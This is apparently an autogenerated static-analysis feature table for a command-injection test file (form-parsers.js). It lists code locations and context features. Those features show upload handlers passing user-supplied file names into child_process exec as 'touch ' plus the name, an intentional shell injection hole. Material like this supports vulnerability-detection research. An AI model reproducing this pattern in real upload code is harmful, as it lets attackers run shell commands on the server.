autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:5 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:11 | req.files | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:11 | req.files | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:11 | req.files | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:11 | req.files | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:11 | req.files | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:19 | req.files.forEach | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:19 | req.files.forEach | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:19 | req.files.forEach | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:19 | req.files.forEach | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:13:19 | req.files.forEach | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | exceptional return of req.fil ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | exceptional return of req.fil ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | exceptional return of req.fil ... OK\\n }) | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | exceptional return of req.fil ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | exceptional return of req.fil ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | req.fil ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | req.fil ... OK\\n }) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | req.fil ... OK\\n }) | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | req.fil ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:3:15:4 | req.fil ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:7:13:11 | files | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:7:13:11 | files | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:7:13:11 | files | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:7:13:11 | files | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:7:13:11 | files | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:13:13:19 | forEach | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:13:13:19 | forEach | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:13:13:19 | forEach | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:13:13:19 | forEach | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:13:13:19 | forEach | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:20 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:20 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:20 | exec | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:20 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:20 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:13:24 | file | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | exceptional return of anonymous function | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | file => ... OK\\n } | CalleeFlexibleAccessPath | req.files.forEach | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | file => ... OK\\n } | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | file => ... OK\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | file => ... OK\\n } | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | file => ... OK\\n } | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | file => ... OK\\n } | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | file => ... OK\\n } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | return of anonymous function | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:13:21:15:3 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:8 | exec | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:8 | exec | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:8 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:8 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exceptional return of exec("t ... alname) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exceptional return of exec("t ... alname) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exceptional return of exec("t ... alname) | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exceptional return of exec("t ... alname) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exceptional return of exec("t ... alname) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exec("t ... alname) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exec("t ... alname) | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exec("t ... alname) | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exec("t ... alname) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:5:14:38 | exec("t ... alname) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:17 | "touch " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:17 | "touch " | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:17 | "touch " | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:17 | "touch " | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:17 | "touch " | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:17 | "touch " | stringConcatenatedWith | -endpoint- file.originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:10:14:37 | "touch ... nalname | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:24 | file | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:24 | file | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:24 | file | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:24 | file | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:24 | file | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:37 | file.originalname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:37 | file.originalname | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:37 | file.originalname | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:37 | file.originalname | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:37 | file.originalname | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:21:14:37 | file.originalname | stringConcatenatedWith | 'touch ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:26:14:37 | originalname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:26:14:37 | originalname | contextSurroundingFunctionParameters | (req, res, next)\n(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:26:14:37 | originalname | enclosingFunctionBody | req res next req files forEach file exec touch file originalname | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:26:14:37 | originalname | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:14:26:14:37 | originalname | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:8 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:8 | http | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:26 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:26 | http | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:26 | http = ... 'http') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:5:19:26 | http = ... 'http') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:18 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:18 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | exceptional return of require('http') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | exceptional return of require('http') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | require('http') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:12:19:26 | require('http') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:20:19:25 | 'http' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:20:19:25 | 'http' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:20:19:25 | 'http' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:20:19:25 | 'http' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:20:19:25 | 'http' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:19:20:19:25 | 'http' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:10 | Busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:10 | Busboy | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:10 | Busboy | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:10 | Busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:30 | Busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:30 | Busboy | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:30 | Busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:30 | Busboy ... usboy') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:30 | Busboy ... usboy') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:5:20:30 | Busboy ... usboy') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:20 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:20 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | exceptional return of require('busboy') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | exceptional return of require('busboy') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | exceptional return of require('busboy') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | require('busboy') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | require('busboy') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:14:20:30 | require('busboy') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:22:20:29 | 'busboy' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:22:20:29 | 'busboy' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:22:20:29 | 'busboy' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:22:20:29 | 'busboy' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:22:20:29 | 'busboy' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:20:22:20:29 | 'busboy' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:22:4 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:22:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:22:4 | http | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:22:17 | http.createServer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:22:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:22:17 | http.createServer | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | exceptional return of http.cr ... oy);\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | exceptional return of http.cr ... oy);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | exceptional return of http.cr ... oy);\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | http.cr ... oy);\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | http.cr ... oy);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:2 | http.cr ... oy);\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:9 | http.cr ... .listen | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:9 | http.cr ... .listen | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:9 | http.cr ... .listen | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | exceptional return of http.cr ... n(8000) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | exceptional return of http.cr ... n(8000) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | exceptional return of http.cr ... n(8000) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | http.cr ... n(8000) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | http.cr ... n(8000) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:1:28:15 | http.cr ... n(8000) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:6:22:17 | createServer | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:6:22:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:6:22:17 | createServer | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | Busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | Busboy | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | Busboy | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | Busboy | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | Busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:22:19:22:18 | this | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding 